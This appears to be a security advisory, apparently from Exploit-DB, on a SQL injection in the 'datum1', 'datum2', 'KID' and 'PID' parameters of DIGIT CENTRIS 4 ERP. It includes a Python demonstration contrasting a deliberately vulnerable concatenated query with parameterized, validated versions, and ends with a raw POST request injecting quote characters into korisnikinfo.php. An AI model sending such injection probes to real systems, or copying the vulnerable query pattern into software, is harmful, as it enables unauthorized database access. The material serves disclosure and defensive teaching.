Vendor: CENTRIS 4 ERP
By: n1x_ [MS-WEB]
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: CENTRIS 4 ERP
Affected Version From: Every version
Affected Version To: Every version
Patch Exists: NO
Related CWE:
CPE: a:digit_rs:digit_centris_4_erp
Metasploit:
Other Scripts:
Platforms Tested:
Date: 2019

DIGIT CENTRIS 4 ERP – ‘datum1’ SQL Injection

The 'datum1' parameter in the DIGIT CENTRIS 4 ERP software is vulnerable to SQL injection attacks. An attacker can manipulate the 'datum1' parameter to execute arbitrary SQL queries on the underlying database.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and parameterized queries to prevent SQL injection attacks. Regularly updating the software to the latest version is also advised.
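To make the recommended mitigation concrete, the following is an added example, not code from the advisory, from Exploit-DB or from DIGIT: the string-concatenation pattern that CWE-89 describes, beside a version that validates the four form fields named in the raw data and binds them with placeholders. It uses Python with an in-memory SQLite table so that it runs stand-alone; the product itself is PHP (korisnikinfo.php), where PDO prepared statements give the same protection. The table `korisnik`, its columns, the sample rows, and the assumption that datum1/datum2 are dd.mm.yyyy dates and KID/PID are integers are all assumptions drawn only from the shape of the values in the captured request.

```python
import re
import sqlite3
from datetime import datetime

# Constructed schema and rows standing in for the ERP's report table; the real
# CENTRIS schema is not on the page and these names are assumptions.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE korisnik (id INTEGER, kid INTEGER, pid INTEGER, datum TEXT)")
    conn.executemany("INSERT INTO korisnik VALUES (?, ?, ?, ?)", [
        (1, 1, 1, "2001-01-01"),
        (2, 1, 2, "2005-06-15"),
        (3, 2, 1, "2010-03-03"),
    ])
    return conn


def query_vulnerable(conn, datum1, datum2, kid, pid):
    """Vulnerable pattern (CWE-89): form values are pasted into the SQL text,
    so any quote character in them reaches the SQL parser as syntax."""
    sql = ("SELECT id FROM korisnik WHERE kid = " + kid + " AND pid = " + pid
           + " AND datum BETWEEN '" + datum1 + "' AND '" + datum2 + "'")
    return [row[0] for row in conn.execute(sql)]


def query_parameterized_only(conn, datum1, datum2, kid, pid):
    """Placeholders alone: the driver binds each value as data, never as SQL,
    so quotes in the input are compared literally and cannot change the query."""
    sql = ("SELECT id FROM korisnik WHERE kid = ? AND pid = ? "
           "AND datum BETWEEN ? AND ?")
    return [row[0] for row in conn.execute(sql, (kid, pid, datum1, datum2))]


# The captured request sends dates as dd.mm.yyyy (e.g. 01.01.2001); assumed format.
DATE_RE = re.compile(r"^\d{2}\.\d{2}\.\d{4}$")


def parse_date(value: str) -> str:
    """Accept only a real dd.mm.yyyy date and normalise it to ISO for the query.
    The regex checks shape; strptime rejects impossible dates such as 30.02.2001."""
    if not DATE_RE.match(value):
        raise ValueError(f"datum must be dd.mm.yyyy, got {value!r}")
    return datetime.strptime(value, "%d.%m.%Y").strftime("%Y-%m-%d")


def parse_id(value: str) -> int:
    """KID/PID look like numeric identifiers (assumption): accept digits only."""
    if not value.isdigit():
        raise ValueError(f"id must be numeric, got {value!r}")
    return int(value)


def query_hardened(conn, datum1, datum2, kid, pid):
    """Recommended form: validate each field's shape first, then bind with placeholders."""
    params = (parse_id(kid), parse_id(pid), parse_date(datum1), parse_date(datum2))
    sql = ("SELECT id FROM korisnik WHERE kid = ? AND pid = ? "
           "AND datum BETWEEN ? AND ?")
    return [row[0] for row in conn.execute(sql, params)]


def probe(fn, conn, **fields):
    """Run one query function and report its outcome instead of raising."""
    try:
        return ("ok", fn(conn, **fields))
    except sqlite3.Error as exc:
        return ("sql_error", type(exc).__name__)
    except ValueError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    db = make_db()
    # The advisory's probe values: a single and a double quote appended to each field.
    tampered = dict(datum1="1'\"", datum2="01.01.2001'\"", kid="1'\"", pid="1'\"")
    legit = dict(datum1="01.01.2001", datum2="31.12.2005", kid="1", pid="1")
    print("concatenated, tampered:   ", probe(query_vulnerable, db, **tampered))
    print("placeholders, tampered:   ", probe(query_parameterized_only, db, **tampered))
    print("validated, tampered:      ", probe(query_hardened, db, **tampered))
    print("validated, legitimate:    ", probe(query_hardened, db, **legit))
    print("validated, impossible date:",
          probe(query_hardened, db, **dict(legit, datum1="30.02.2001")))
```

Running the file with the advisory's `1'"` values shows the three outcomes side by side: the concatenated query fails inside the SQL parser (proof that the quote characters were interpreted as syntax), the placeholder-only query treats them as an ordinary string and returns no rows, and the validated query rejects the input before any SQL is built. The date check also catches a well-formed but impossible value such as 30.02.2001 that a regex alone would pass, which is the kind of edge case worth covering when the field feeds a BETWEEN range.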

Exploit-DB raw data:

# Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
# Date: 2019-09-19
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: http://www.digit-rs.com/
# Product Homepage: http://digit-rs.com/centris.html
# Version: Every version
# CVE : N/A

# Vulnerable parameters: datum1, datum2, KID, PID 

# [POST REQUEST]
 
POST /korisnikinfo.php HTTP/1.1
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
Referer: http://host
Host: host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
 
ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"